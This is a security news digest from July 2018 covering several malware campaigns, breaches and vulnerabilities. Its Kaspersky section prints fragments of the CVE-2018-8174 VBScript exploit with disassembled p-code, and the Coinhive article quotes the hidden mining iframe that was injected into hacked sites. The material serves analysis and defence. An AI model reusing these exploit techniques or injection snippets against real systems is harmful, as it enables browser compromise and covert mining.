English Articles - Úvod  Odborné èlánky  Bleskovky  Témata  List  EN  CZ  Seriály  Blogy  ÈlánkyCZ

Úvod  0  1  2  3  4  5  6  7  8  9  10  11  12  13  14  15  16  17  18  19  20  21  22  23  24  25  26  27  28  29  30  31  32  33  34  35  36  37  38  39  40  41  42  43  44  45  46  47  48  49  50 


 


New Smoke Loader Attack Targets Multiple Credentials
5.7.2018 securityweek
Virus

A recently detected Smoke Loader infection campaign is attempting to steal credentials from a broad range of applications, including web browsers, email clients, and more.

The attacks begin with malicious emails carrying a Word document as an attachment. Using social engineering, the attackers attempt to lure victims into opening the document and executing an embedded macro.

Once executed, the macro initiates a second stage and downloads the TrickBot malware, which instead fetches the Smoke Loader backdoor, Cisco Talos reports.

Smoke Loader has been long used as a downloader for various malware families, including banking Trojans, ransomware, and crypto-currency miners. In some of the previous campaigns, it was also used as a dropper for TrickBot, but it appears tables have turned now.

“Smoke Loader has often dropped Trickbot as a payload. This sample flips the script, with our telemetry showing this Trickbot sample dropping Smoke Loader. This is likely an example of malware-as-a-service, with botnet operators charging money to install third-party malware on infected computers,” Talos says.

The new backdoor variant, the security researchers reveal, doesn’t iterate through process lists to find a process to inject code into, but calls the Windows API GetShellWindow instead, then calls GetWindowThreadProcessId to get the process ID of evfdxplorer.exe. It also uses the PROPagate technique to inject code into Explorer.

First described in late 2017, the method hasn’t been adopted by another malware to date, and no public Proof-of-Concept (PoC) has been published to date. Smoke Loader is the first to use the technique, and FireEye too reported this last week.

The malware also includes a series of anti-analysis techniques, along with anti-debugging and anti-VM checks.

Unlike previous attacks, where Smoke Loader would drop additional payloads, the backdoor was observed receiving five plugins instead. Each plugin was executed in its own Explorer.exe process, but older techniques were used to inject each plugin into those processes. The attack ultimately results in six Explorer.exe processes running on the infected machine.

All of the plugins were designed to steal sensitive information from the victim machine and explicitly target stored credentials and sensitive information transferred over a browser.

The first plugin contains around 2,000 functions and targets Firefox, Internet Explorer, Chrome, Opera, QQ Browser, Outlook, and Thunderbird to steal hostname, username, and password data. Additionally, it attempts to steal information from the Windows Credential Manager, as well as POP3, SMTP, IMAP credentials.

The second plugin searches through directories for files to parse and exfiltrate. The third plugin injects into browsers to intercept credentials and cookies, the fourth attempts to steal credentials for ftp, smtp, pop3, and imap, while the fifth injects code into TeamViewer.exe for credential theft.

“We have seen that the Trojan and botnet market is constantly undergoing changes. The players are continuously improving their quality and techniques. They modify these techniques on an ongoing basis to enhance their capabilities to bypass security tools. This clearly shows how important it is to make sure all our systems are up to date,” Talos concludes.


Delving deep into VBScript

5.7.2018 Kaspersky Vulnerebility
Analysis of CVE-2018-8174 exploitation
In late April we found and wrote a description of CVE-2018-8174, a new zero-day vulnerability for Internet Explorer that was picked up by our sandbox. The vulnerability uses a well-known technique from the proof-of-concept exploit CVE-2014-6332 that essentially “corrupts” two memory objects and changes the type of one object to Array (for read/write access to the address space) and the other object to Integer to fetch the address of an arbitrary object.

But whereas CVE-2014-6332 was aimed at integer overflow exploitation for writing to arbitrary memory locations, my interest lay in how this technique was adapted to exploit the use-after-free vulnerability. To answer this question, let’s consider the internal structure of the VBScript interpreter.

Undocumented platform
Debugging a VBScript executable is a tedious task. Before the script is executed, it is compiled into p-code, which is then interpreted by the virtual machine. There is no open source information about the internal structure of this virtual machine and its instructions. It took me a lot of effort to track down a couple of web pages with Microsoft engineer reports dated 1999 and 2004 that shed some light on the p-code. There was enough information there for me to fully reverse-engineer all the VM instructions and write a disassembler! The final scripts for disassembling VBScript p-code in the memory of the IDA Pro and WinDBG debuggers are available in our Github repository.

With an understanding of the interpreted code, we can precisely monitor the execution of the script: we have full information about where the code is being executed at any given moment, and we can observe all objects that are created and referenced by the script. All this greatly assists in the analysis.

The best place to run the disassembling script is the CScriptRuntime::RunNoEH function, which directly interprets the p-code.

Important fields in the CScriptRuntime class

The CScriptRuntime class contains all information about the state of the interpreter: local variables, function arguments, pointers to the top of the stack and the current instruction, plus the address of the compiled script.

The VBScript virtual machine is stack-oriented and consists of slightly more than 100 instructions.

All variables (local arguments and ones on the stack) are represented as a VARIANT structure occupying 16 bytes, where the upper word indicates the data type. Some of the type values are given on the relevant MSDN page.

CVE-2018-8174 exploitation
Below is the code and disassembled p-code of class ‘Class1’:

Class Class1
Dim mem
Function P
End Function
Function SetProp(Value)
mem=Value
SetProp=0
End Function
End Class
 

Class Class1
Dim mem
Function P
End Function
Function SetProp(Value)
mem=Value
SetProp=0
End Function
End Class

Function 34 (‘Class1’) [max stack = 1]:
arg count = 0
lcl count = 0
Pcode:
0000 OP_CreateClass
0005 OP_FnBindEx ‘p’ 35 FALSE
000F OP_FnBindEx ‘SetProp’ 36 FALSE
0019 OP_CreateVar ‘mem’ FALSE
001F OP_LocalSet 0
0022 OP_FnReturn
Function 35 (‘p’) [max stack = 0]:
arg count = 0
lcl count = 0
Pcode:
***BOS(8252,8264)*** End Function *****
0000 OP_Bos1 0
0002 OP_FnReturn
0003 OP_Bos0
0004 OP_FuncEnd
Function 36 (‘SetProp’) [max stack = 1]:
arg count = 1
arg -1 = ref Variant ‘value’
lcl count = 0
Pcode:
***BOS(8292,8301)*** mem=Value *****
0000 OP_Bos1 0
0002 OP_LocalAdr -1
0005 OP_NamedSt ‘mem’
***BOS(8304,8315)*** SetProp=(0) *****
000A OP_Bos1 1
000C OP_IntConst 0
000E OP_LocalSt 0
***BOS(8317,8329)*** End Function *****
0011 OP_Bos1 2
0013 OP_FnReturn
0014 OP_Bos0
0015 OP_FuncEnd
 

Function 34 (‘Class1’) [max stack = 1]:
arg count = 0
lcl count = 0
Pcode:
0000 OP_CreateClass
0005 OP_FnBindEx ‘p’ 35 FALSE
000F OP_FnBindEx ‘SetProp’ 36 FALSE
0019 OP_CreateVar ‘mem’ FALSE
001F OP_LocalSet 0
0022 OP_FnReturn
Function 35 (‘p’) [max stack = 0]:
arg count = 0
lcl count = 0
Pcode:
***BOS(8252,8264)*** End Function *****
0000 OP_Bos1 0
0002 OP_FnReturn
0003 OP_Bos0
0004 OP_FuncEnd
Function 36 (‘SetProp’) [max stack = 1]:
arg count = 1
arg –1 = ref Variant ‘value’
lcl count = 0
Pcode:
***BOS(8292,8301)*** mem=Value *****
0000 OP_Bos1 0
0002 OP_LocalAdr –1
0005 OP_NamedSt ‘mem’
***BOS(8304,8315)*** SetProp=(0) *****
000A OP_Bos1 1
000C OP_IntConst 0
000E OP_LocalSt 0
***BOS(8317,8329)*** End Function *****
0011 OP_Bos1 2
0013 OP_FnReturn
0014 OP_Bos0
0015 OP_FuncEnd
Function 34 is a constructor of class ‘Class1’.

The OP_CreateClass instruction calls the VBScriptClass::Create function to create a VBScriptClass object.

The OP_FnBindEx and OP_CreateVar instructions try to fetch the variables passed in the arguments, and since they do not yet exist, they are created by the VBScriptClass::CreateVar function.

This diagram shows how variables can be fetched from a VBScriptClass object. The value of the variable is stored in the VVAL structure:

To understand the exploitation, it is important to know how variables are represented in the VBScriptClass structure.

When the OP_NamedSt ‘mem’ instruction is executed in function 36 (‘SetProp’), it calls the Default Property Getter of the instance of the class that was previously stacked and then stores the returned value in the variable ‘mem’.

***BOS(8292,8301)*** mem=Value *****
0000OP_Bos1 0
0002OP_LocalAdr -1 <-------- put argument on stack
0005OP_NamedSt ‘mem’ <-------- if it's a class dispatcher with Default Property Getter, call and store returned value in mem

Below is the code and disassembled p-code of function 30 (p), which is called during execution of the OP_NamedSt instruction:

Class lllIIl
Public Default Property Get P
Dim llII
P=CDbl(“174088534690791e-324”)
For IIIl=0 To 6
IIIlI(IIIl)=0
Next
Set llII=New Class2
llII.mem=lIlIIl
For IIIl=0 To 6
Set IIIlI(IIIl)=llII
Next
End Property
End Class
 

Class lllIIl
Public Default Property Get P
Dim llII
P=CDbl(“174088534690791e-324”)
For IIIl=0 To 6
IIIlI(IIIl)=0
Next
Set llII=New Class2
llII.mem=lIlIIl
For IIIl=0 To 6
Set IIIlI(IIIl)=llII
Next
End Property
End Class

Function 30 (‘p’) [max stack = 3]:
arg count = 0
lcl count = 1
lcl 1 = Variant ‘llII’
tmp count = 4
Pcode:
***BOS(8626,8656)*** P=CDbl(“174088534690791e-324”) *****
0000 OP_Bos1 0
0002 OP_StrConst ‘174088534690791e-324’
0007 OP_CallNmdAdr ‘CDbl’ 1
000E OP_LocalSt 0
***BOS(8763,8782)*** For IIIl=(0) To (6) *****
0011 OP_Bos1 1
0013 OP_IntConst 0
0015 OP_IntConst 6
0017 OP_IntConst 1
0019 OP_ForInitNamed ‘IIIl’ 5 4
0022 OP_JccFalse 0047
***BOS(8809,8824)*** IIIlI(IIIl)=(0) *****
0027 OP_Bos1 2
0029 OP_IntConst 0
002B OP_NamedAdr ‘IIIl’
0030 OP_CallNmdSt ‘IIIlI’ 1
***BOS(8826,8830)*** Next *****
0037 OP_Bos1 3
0039 OP_ForNextNamed ‘IIIl’ 5 4
0042 OP_JccTrue 0027
***BOS(8855,8874)*** Set llII=New Class2 *****
0047 OP_Bos1 4
0049 OP_InitClass ‘Class2’
004E OP_LocalSet 1
***BOS(8876,8891)*** llII.mem=lIlIIl *****
0051 OP_Bos1 5
0053 OP_NamedAdr ‘lIlIIl’
0058 OP_LocalAdr 1
005B OP_MemSt ‘mem’
….
 

Function 30 (‘p’) [max stack = 3]:
arg count = 0
lcl count = 1
lcl 1 = Variant ‘llII’
tmp count = 4
Pcode:
***BOS(8626,8656)*** P=CDbl(“174088534690791e-324”) *****
0000 OP_Bos1 0
0002 OP_StrConst ‘174088534690791e-324’
0007 OP_CallNmdAdr ‘CDbl’ 1
000E OP_LocalSt 0
***BOS(8763,8782)*** For IIIl=(0) To (6) *****
0011 OP_Bos1 1
0013 OP_IntConst 0
0015 OP_IntConst 6
0017 OP_IntConst 1
0019 OP_ForInitNamed ‘IIIl’ 5 4
0022 OP_JccFalse 0047
***BOS(8809,8824)*** IIIlI(IIIl)=(0) *****
0027 OP_Bos1 2
0029 OP_IntConst 0
002B OP_NamedAdr ‘IIIl’
0030 OP_CallNmdSt ‘IIIlI’ 1
***BOS(8826,8830)*** Next *****
0037 OP_Bos1 3
0039 OP_ForNextNamed ‘IIIl’ 5 4
0042 OP_JccTrue 0027
***BOS(8855,8874)*** Set llII=New Class2 *****
0047 OP_Bos1 4
0049 OP_InitClass ‘Class2’
004E OP_LocalSet 1
***BOS(8876,8891)*** llII.mem=lIlIIl *****
0051 OP_Bos1 5
0053 OP_NamedAdr ‘lIlIIl’
0058 OP_LocalAdr 1
005B OP_MemSt ‘mem’
….
The first basic block of this function is:

***BOS(8626,8656)*** P=CDbl(“174088534690791e-324”) *****
0000OP_Bos1 0
0002OP_StrConst ‘174088534690791e-324’
0007OP_CallNmdAdr’CDbl’ 1
000EOP_LocalSt 0

This block converts the string ‘174088534690791e-324’ to VARIANT and stores it in the local variable 0, reserved for the return value of the function.

VARIANT obtained after converting ‘174088534690791e-324’ to double

After the return value is set but before it is returned, this function performs:

For IIIl=0 To 6
IIIlI(IIIl)=0
Next

This calls the garbage collector for the ‘Class1’ instance and results in a dangling pointer reference due to the use-after-free vulnerability in Class_Terminate() that we discussed earlier.

In the line

***BOS(8855,8874)*** Set llII=New Class2 *****
0047OP_Bos1 4
0049OP_InitClass ‘Class2’
004EOP_LocalSet 1

the OP_InitClass ‘Class2’ instruction creates an “evil twin” instance of class ‘Class1’ at the location of the previously freed VBScriptClass, which is still referenced by the OP_NamedSt ‘mem’ instruction in function 36 (‘SetProp’).

Class ‘Class2’ is the “evil twin” of class ‘Class1’:

Class Class2
Dim mem
Function P0123456789
P0123456789=LenB(mem(IlII+(8)))
End Function
Function SPP
End Function
End Class
 

Class Class2
Dim mem
Function P0123456789
P0123456789=LenB(mem(IlII+(8)))
End Function
Function SPP
End Function
End Class

Function 31 (‘Class2’) [max stack = 1]:
arg count = 0
lcl count = 0
Pcode:
0000 OP_CreateClass ‘Class2’
0005 OP_FnBindEx ‘P0123456789’ 32 FALSE
000F OP_FnBindEx ‘SPP’ 33 FALSE
0019 OP_CreateVar ‘mem’ FALSE
001F OP_LocalSet 0
0022 OP_FnReturn
Function 32 (‘P0123456789’) [max stack = 2]:
arg count = 0
lcl count = 0
Pcode:
***BOS(8390,8421)*** P0123456789=LenB(mem(IlII+(8))) *****
0000 OP_Bos1 0
0002 OP_NamedAdr ‘IlII’
0007 OP_IntConst 8
0009 OP_Add
000A OP_CallNmdAdr ‘mem’ 1
0011 OP_CallNmdAdr ‘LenB’ 1
0018 OP_LocalSt 0
***BOS(8423,8435)*** End Function *****
001B OP_Bos1 1
001D OP_FnReturn
001E OP_Bos0
001F OP_FuncEnd
Function 33 (‘SPP’) [max stack = 0]:
arg count = 0
lcl count = 0
Pcode:
***BOS(8451,8463)*** End Function *****
0000 OP_Bos1 0
0002 OP_FnReturn
0003 OP_Bos0
0004 OP_FuncEnd
 

Function 31 (‘Class2’) [max stack = 1]:
arg count = 0
lcl count = 0
Pcode:
0000 OP_CreateClass ‘Class2’
0005 OP_FnBindEx ‘P0123456789’ 32 FALSE
000F OP_FnBindEx ‘SPP’ 33 FALSE
0019 OP_CreateVar ‘mem’ FALSE
001F OP_LocalSet 0
0022 OP_FnReturn
Function 32 (‘P0123456789’) [max stack = 2]:
arg count = 0
lcl count = 0
Pcode:
***BOS(8390,8421)*** P0123456789=LenB(mem(IlII+(8))) *****
0000 OP_Bos1 0
0002 OP_NamedAdr ‘IlII’
0007 OP_IntConst 8
0009 OP_Add
000A OP_CallNmdAdr ‘mem’ 1
0011 OP_CallNmdAdr ‘LenB’ 1
0018 OP_LocalSt 0
***BOS(8423,8435)*** End Function *****
001B OP_Bos1 1
001D OP_FnReturn
001E OP_Bos0
001F OP_FuncEnd
Function 33 (‘SPP’) [max stack = 0]:
arg count = 0
lcl count = 0
Pcode:
***BOS(8451,8463)*** End Function *****
0000 OP_Bos1 0
0002 OP_FnReturn
0003 OP_Bos0
0004 OP_FuncEnd
The location of variables in memory is predictable. The amount of data occupied by the VVAL structure is calculated using the formula 0x32 + the length of the variable name in UTF-16.

Below is a diagram that shows the location of ‘Class1’ variables relative to ‘Class2’ variables when ‘Class2’ is allocated in place of ‘Class1’.

When execution of the OP_NamedSt ‘mem’ instruction in function 36 (‘SetProp’) is complete, the value returned by function 30 (‘p’) is written to memory through the dangling pointer of VVAL ‘mem’ in Class1, overwriting the VARIANT type of VVAL ‘mem’ in Class2.

VARIANT of type Double overwrites the VARIANT type from String to Array

Thus, an object of type String is converted to an object of type Array, and data that was previously considered to be a string is treated as an Array control structure, allowing access to be gained to the entire address space of the process.

Conclusion
Our scripts for disassembling VBScript compiled into p-code enable VBScript debugging at the bytecode level, which helps to analyze exploits and understand how VBScript operates. They are available in our Github repository

The case of CVE-2018-8174 demonstrates that when memory allocations are highly predictable, use-after-free vulnerabilities are easy to exploit. The in-the-wild exploit targets older versions of Windows. The location of objects in memory required for its exploitation is most likely to occur in Windows 7 and Windows 8.1.

Automatic Exploit Protection (AEP), part of Kaspersky Lab products, blocks all stages of the exploit with the following verdicts:

HEUR:Exploit.MSOffice.Generic
HEUR:Exploit.Script.CVE-2018-8174.a
HEUR:Exploit.Script.Generic
HEUR:Trojan.Win32.Generic
PDM:Exploit.Win32.Generic


Gentoo Publishes Incident Report After GitHub Hack

5.7.2018 securityweek Hacking

Gentoo GitHub account hacked

Maintainers of the Gentoo Linux distribution published an incident report on Wednesday after someone hijacked one of the organization’s GitHub accounts and planted malicious code.

The attack started on June 28 and the hacker (or hackers) not only changed content in compromised repositories, but also locked out Gentoo developers from the targeted GitHub account. This made the attack “loud” – Gentoo believes the hackers could have maintained access longer had they been quieter.

GitHub could not be used by Gentoo for a total of five days as a result of the incident. The breach also led to a disruption of the Gentoo Proxy Maintainers Project as it uses GitHub to submit pull requests, and all past pull requests were disconnected from their original commits.

The attacker also attempted to wipe users’ files by adding “rm-rf” to some repositories, but Gentoo believes this method was unlikely to work due to “various technical guards.”

The GitHub account was compromised after the hacker gained access to an admin account that had a predictable password.

“Evidence collected suggests a password scheme where disclosure on one site made it easy to guess passwords for unrelated webpages,” Gentoo wrote in its incident report.

The incident report summarizes the lessons learned by Gentoo following the incident and the actions taken or planned in response. These actions include making frequent backups, requiring the use of two-factor authentication (2FA) and introducing support for hardware-based 2FA, reducing the number of users with elevated privileges, auditing logins, publishing password policies, and suggesting the use of password managers.

Gentoo is also working on an incident response plan, particularly for sharing information about a security incident with users.

The maintainers of the Linux distribution believe the breach has been contained and restored the impacted GitHub page.


Facebook Responding to US Regulators in Data Breach Probe

5.7.2018 securityweek  Social

Facebook acknowledged Tuesday it was facing multiple inquiries from US and British regulators about the major Cambridge Analytica user data scandal.

The leading social network offered no details but its admission confirmed reports of a widening investigation into the misuse of private data by Facebook and its partners.

"We are cooperating with officials in the US, UK and beyond," a Facebook spokesman said in response to an AFP query.

"We've provided public testimony, answered questions, and pledged to continue our assistance as their work continues."

The Washington Post reported that the Securities and Exchange Commission, Federal Trade Commission and FBI as well as the Justice Department are looking into the massive breach of users' personal data and how the company handled it.

Facebook shares closed the shortened Nasdaq trading day down 2.35 percent to $192.73, heading into an Independence Day holiday with investors mulling what effect the investigations may have on the California-based internet giant.

Facebook has admitted that up to 87 million users may have had their data hijacked by British consultancy Cambridge Analytica, which worked for US President Donald Trump during his 2016 campaign.

Facebook chief Mark Zuckerberg apologized to the European Parliament in May and said the social media giant is taking steps to prevent such a breach from happening again.

Zuckerberg said at a hearing in Brussels that it became clear in the last two years that Facebook executives didn't do enough to prevent the platform "from being used for harm."

Zuckerberg was grilled about the breach in US Congress in April.

It remains unclear what if any penalties Facebook may face from the latest requests but the tech giant is legally bound to comply with a 2011 consent decree with the FTC on protecting private user data.

Any SEC inquiry could look at whether Facebook adequately disclosed key information to investors.


Why Banning Risks to Cybersecurity Doesn’t Actually Improve Cybersecurity

5.7.2018 securityaffairs Cyber

There’s a prevailing mindset that suggests if organizations ban all the things that pose risks to overall cybersecurity, they’re taking the most effective approach to make their organizations secure.
Initially, that line of thinking seems sensible in some regards. After all, if the aspects that threaten cybersecurity aren’t allowed at all, the problems they pose could never crop up.

But, that belief is far too simplistic. Other interventions must occur to make cybersecurity a priority, whether it’s for specific websites or entire establishments.

1. Bans Could Limit or Prevent Access to Technology
Officials associated with the U.S. government are aiming to block Huawei components from entering the country’s marketplace if they’re used on communications equipment. The argument is that those parts compromise the nation’s security.

But, it’s a short-sighted approach since all the nation’s telecommunications providers already depend on equipment from Chinese manufacturers. Instituting a ban on goods for Huawei could prevent companies from getting federal funding that increases access to technology in communities with limited internet access.

Moreover, the economical prices associated with Huawei equipment make the items fit the budgets of small carriers that cannot afford pricier goods. If telecommunications providers no longer have the option to buy and use Huawei merchandise, the households and businesses in rural areas may have no means for getting internet access.

Instead of focusing on individual companies and prohibiting those from selling goods to companies in the U.S., it’s preferable for the country to develop a comprehensive national security strategy that’s not brand dependent.

2. Existing Cybersecurity Plans Generally Fall Short
A report from the U.S. State Department warned that it’s still easy to find cybersecurity vulnerabilities at public and private organizations despite increased investments meant to protect the respective networks.

A plan that only involves banning specific software titles or manufacturers isn’t robust enough because it’s not all-encompassing. Instead, organizations need to carry out intensive security audits and identify all the weak points in the networks and proactively try to minimize them.

In many cases, they can do this by implementing some of the most promising technological strategies. For example, context-based authentication and authorization use analytic data to calculate a risk score that determines whether to grant, deny or challenge a person’s access attempts.

Plus, if organizations attempt to ban software on workplace computers, that step might not be sufficient because so many people use mobile devices and apps to access workplace content from home, and their employers likely don’t know it’s happening.

3. Risks Are Not Always Apparent
It could take weeks or even months before organizations realize certain kinds of software may be detrimental to their overall cybersecurity strategies. That’s especially true because such findings are often discovered by diligent independent researchers who sound the alarm for the benefit of the public.

The Amazon Echo is one example of a gadget with software that’s had some gaping holes. In one instance, researchers illuminated an issue that could allow hackers to listen to, transcribe and transmit things people said after they used an Alexa skill that seemed legitimate.

Amazon quickly responded to the incident and fixed the problem. However, this case study proves it’s not always possible to tell whether software is risky or safe. People use Alexa daily without problems, but that doesn’t mean the software is trouble-free, nor that companies should rush to ban it.

If companies are too quick to disallow some kinds of software, they could prevent employees from accessing things at their workplaces that are genuinely helpful. In short, there is not a straightforward, fail-safe method for determining if a piece of software is safe or problematic. Even the most well-built software can have shortcomings.

4. We’re Living in a Global Economy
Wayne Jones, the chief information officer at the National Nuclear Security Administration, points out that instead of enforcing bans, the better approach to take is to figure out how to use software in ways that protect a company’s information.

He also brought up how we’re all living in a global economy, and that’s another reason why software bans don’t have the intended effect of bolstering cybersecurity.

The people who develop software and work on other tech-related projects often originate from foreign nations.

If the U.S. made a federal decision not to use equipment made by Huawei, would that ruling eventually progress to prevent anyone with past ties to the company from working for a United States business, then bar people from certain nations from taking tech-related jobs in the U.S?

If so, the United States could find its tech development efforts substantially hindered, not to mention spend a significant amount of time determining which equipment features parts manufactured by countries on a theoretical “banned” list.

A Proactive Stance Is Essential
One thing people must remember is that cybercriminals tend to find ways to infiltrate systems even when doing so means overcoming obstacles. That means an outright ban on software — or anything else that might compromise cybersecurity — isn’t advisable.

Instead, organizations of all sizes must show proactiveness and learn to monitor for threats, counteract infiltration attempts and tighten their infrastructures when necessary.

Cybersecurity


Adware already infected at least 78000 Fortnite Players
5.7.2018 securityaffairs
Virus

Rainway reported that tens of thousands of Fortnite players have been infected with an adware while downloading fake v-buck generators
Fortnite continues to be one of the most popular game and crooks are attempting to target millions of fans in different ways.

In June, experts observed cyber criminals attempting to exploit the interest in forthcoming Fortnite Android to infect millions of fans.

Not only users interested in the Android version of the popular game are the target of cyber criminals, crooks are now targeting gamers searching for Fortnite v-bucks generator.

v-buck is the in-game currency can be spent in both the Battle Royale PvP mode and the Save the World PvE campaign, in the former to purchase new customization items while in the latter to purchase Llama Pinata card packs.

Clearly many gamers search for v-buck generators, but these applications may hide dangerous malware.

Fortnite v-bucks

Researchers at the Web-based game-streaming platform Rainway reported that tens of thousands of Fortnite players have already attempted to download the fake generators with the result of infecting their systems.

The malicious code associated with this campaign is a strain of malware that hijacks encrypted HTTPS web sessions to inject fraudulent ads into every website they visit.

“On the early morning of June 26th, we began receiving hundreds of thousands of error reports to our tracker. Not feeling very excited to see such an influx of events on a Tuesday the engineering team was a bit flustered, after all, we hadn’t released any updates to that particular piece of our solution.” reads the blog post published by Rainway CEO Andrew Sampson.
The experts at Rainway started the investigation after they were noticing hundreds of thousands of error reports from server logs. The internal staff discovered that the systems of their users were attempting to connect with various ad platforms.

Since Rainway system only allows to load content from whitelisted domains, all the requests discovered by the company attempted to download ads from other domains and for this reason they were triggering connection errors.

Rainway experts analyzed hundreds of Fortnite exploit software searching for the ones that were generating the same errors reported by Rainway users.

Rainway discovered that the errors were generated by systems that were infected with a fake V-Bucks generator.

Searching online it is quite easy to find any kind of software that poses as a Fortnite hack tool, these applications are advertised through YouTube videos and claim to allow players to generate free V-Bucks, in addition to a classic aimbot.

Fortnite v-buck

Once the malicious code has infected the player’s system, it will immediately install a root certificate and configure the Windows machine to act as a proxy for the web traffic.

This specific campaign was delivering adware that alters the pages of a web request to inject ads.

Fortnite v-buck
The Rainway team was able to identify the server hosting the malware, they were compromised by attackers that were abusing them. The experts informed the company operating the compromised servers quickly removed the malware.

“Now, the adware began altering the pages of all web request to add in tags for Adtelligent and voila, we’ve found the source of the problem — now what?”

“We began by sending an abuse report to the file host, and the download was removed promptly, this was after accumulating over 78,000 downloads. We also reached out to Adtelligent to report the keys linked to the URLs. We have not received a response at this time. SpringServe quickly worked with us to identify the abusive creatives and remove them from their platform.” continues Rainway.

Rainway is warning gamers to not to install hack tools or game cheats.

Given Fortnite’s popularity, we can imagine that many other cases will emerge in the forthcoming weeks.


Crooks leverage obfuscated Coinhive shortlink in a large crypto-mining operation
5.7.2018 securityaffairs Cryptocurrency

Crooks leverage an alternative scheme to mine cryptocurrencies, they don’t inject the CoinHive JavaScript miner directly into compromised websites.
Security researchers at MalwareLabs have uncovered a new crypto mining campaign that leverages an alternative scheme to mine cryptocurrencies, differently from other campaigns, crooks don’t inject the CoinHive JavaScript miner directly in compromised websites.

CoinHive also provides an “URL shortener” service that allows users to create a short link for any URL with, the unique difference with similar services is that it introduces a delay so that it can mine Monero cryptocurrency for an interval of time before redirecting the user to the original URL.

The redirection time is adjustable via Coinhive’s settings, this means that the attackers can force visitors’ web browsers to mine cryptocurrency for a longer period.

The experts at Malwarebytes discovered a large number of legitimate websites have been hacked by crooks to load short URLs generated using the CoinHive service through a hidden HTML iFrame. With this trick, attackers aim at forcing visitors’ browsers into mining cryptocurrencies.

“We detected hundreds of new domains, all legitimate websites that were injected with a blurb of hexadecimal code. Once decoded, it shows as an invisible iframe (1×1 pixel) to cnhv[.]co/3h2b2. We believe it is part of the same campaign that was exposed by the folks over at Sucuri at the end of May.” reads the analysis published by Malwarebytes.

"<i frame src="https://cnhv[.]co/3h2b2" width="1" height="1" align="left"></i frame>"
CoinHive JavaScript miner

“The cnhv[.]co domain name is used for what Coinhive calls shortlinks, essentially a way of monetizing on hyperlinks by making visitors’ browsers solve a certain number of hashes before they reach their destination site. When clicking on such a link, you will see a progress bar and within a few seconds, you will be redirected. Crooks are abusing this feature by loading those shortlinks as hidden iframes with an unreasonably high hash count.”

This mining scheme is a novelty in the threat landscape because it doesn’t leverage on the injection of CoinHive’s JavaScript in the compromised websites.

Malwarebytes experts linked this last campaign to the one monitored by Sucuri researchers in May.

The attackers add an obfuscated javascript code into the compromised websites, this code is used to dynamically injects an invisible iframe (1×1 pixel) into the webpage as soon as it is loaded on the web browser.

The webpage then automatically starts mining until the Coinhive short-link service redirects the user to the original URL.

coinhive script 2.png

“In Figure 3 where we made the iframe visible by changing its dimensions, to show that rather than wait for a few seconds before being redirected, users will unknowingly be mining for as long as they stay on the page.” continues the analysis from Malwarebytes.
“Indeed, while Coinhive’s default setting is set to 1024 hashes, this one requires 3,712,000 before loading the destination URL.”
Experts also discovered that cybercriminals are injecting hyperlinks to other compromised websites to trick victims into downloading cryptocurrency miners for desktops that are disguised as legitimate software.

“In this campaign, we see infrastructure used to push an XMRig miner onto users by tricking them into downloading files they were searching for online,” continues the researchers.

“In the meantime, hacked servers are instructed to download and run a Linux miner, generating profits for the perpetrators but incurring costs for their owners.”

Further technical details about the campaign, including the IoCs, are reported in the blog post.


The GandCrab ransomware V4 appears in the threat landscape
4.7.2018 securityaffairs
Ransomware

A new variant of the infamous GandCrab ransomware V4 was released during the weekend, experts shared details of the threat,
A new version of the dreaded GandCrab ransomware (V4) was released during the weekend and according to the experts it included numerous changes.

Fly
@china591
New #GandCrab version "V4" GANDCRAB V4 Ransomware – Remove and Restore .KRAB Encrypted Files

Fly
@china591
Replying to @malwrhunterteam and 2 others
https://www.virustotal.com/#/file/ef7b107c93e6d605a618fee82d5aeb2b32e3265999f332f624920911aabe1f23/detection …https://app.any.run/tasks/daa35edf-94dc-416b-a7b1-fd45b6900c43 …

MD597a910c50171124f2cd8cfc7a4f2fa4f
SHA-13737d782cb64fa92d2c42f3c2857ee2295dc8aa4
Authentihashd64152842b2b787a86bb5dd2084ae40efd9914df8a880eb242f67ce5447a46f6

10:29 AM - Jul 3, 2018
See Fly's other Tweets
Twitter Ads info and privacy
The GandCrab ransomware V4 uses different encryption algorithms (likely the Salsa20 stream cipher) and a new TOR payment site (gandcrabmfe6mnef.onion), it appends the “.KRAB” extension to the encrypted file’s names and use a new ransom note name.

GandCrab ransomware V4

Marcelo Rivero
@MarceloRivero
· 3 Jul
#GandCrab #v4 🦀🆕
[+] Extension: ".KRAB"
[+] Internal version: 4.0
[+] Note: KRAB-DECRYPT.txt
[+] Tor: gandcrabmfe6mnef[.]onion
[-] No more wallpaper routine and no C2C.https://beta.virusbay.io/sample/browse/97a910c50171124f2cd8cfc7a4f2fa4f … pic.twitter.com/dvw604AKBG

Marcelo Rivero
@MarceloRivero
#GandCrab V4 internal version: 4.0 - seems to use now #Salsa20 stream cipher 🧐 pic.twitter.com/Op01bBC50g

4:42 AM - Jul 3, 2018
View image on Twitter
12
See Marcelo Rivero's other Tweets
Twitter Ads info and privacy
The GandCrab authors left a message in the code for the computer science professor at the University of Illinois at Chicago Daniel J. Bernstein who created the Salsa20 algorithm.

@hashbreaker Daniel J. Bernstein let's dance salsa <3
According to a malware researcher Fly, the GandCrab ransomware V4 is currently being distributed through fake software crack sites.

“The ransomware distributors will hack legitimate sites and setup fake blogs that offer software crack downloads. When a user downloads and runs these cracks, they will install the GandCrab Ransomware onto the computer.” wrote Lawrence Abrams from Bleeping Computer.

Like previous variants, when GandCrab ransomware V4 is executed it will scan the computer and network shares for files to encrypt.

Lawrence added that this variant enumerates all shares on the network and not just mapped drives. Once encrypted files, the ransomware will create ransom notes named KRAB-DECRYPT.txt that includes payment instructions. The ransom amount is currently $1,200 USD worth of DASH (DSH) cryptocurrency.

GandCrab ransomware V4

The TOR payment site includes a support section where victims can send messages to the developers and request to decrypt one file for free as the proof of their abilities.

The bad news is that, at this time, victims of GandCrab ransomware v4 cannot decrypt their files for free.


Rowhammer Evolves into RAMpage Exploit, Targeting Android Phones Since 2012
4.7.2018 securityaffairs Android

rThis week researchers demonstrated that most Android phones released since 2012 are still vulnerable to the RAMpage attack.
In 2012, security researchers identified a bug in modern DRAM (dynamic random access memory) chips that could lead to memory corruption.

In 2015, Google Project Zero researchers demonstrated “rowhammer“, a working exploit of this attack providing privilege escalation on vulnerable Linux and Windows systems. In 2016, researchers at VUSec published Drammer, demonstrating that the rowhammer technique could be used to gain root on Android devices. Google scrambled to fix the vulnerability in 2016, but this week researchers demonstrated that those fixes are incomplete and most Android phones released since 2012 are still vulnerable to the latest iteration of the attack, known as RAMpage. Since this is a hardware vulnerability, it is very difficult to retroactively “fix.”

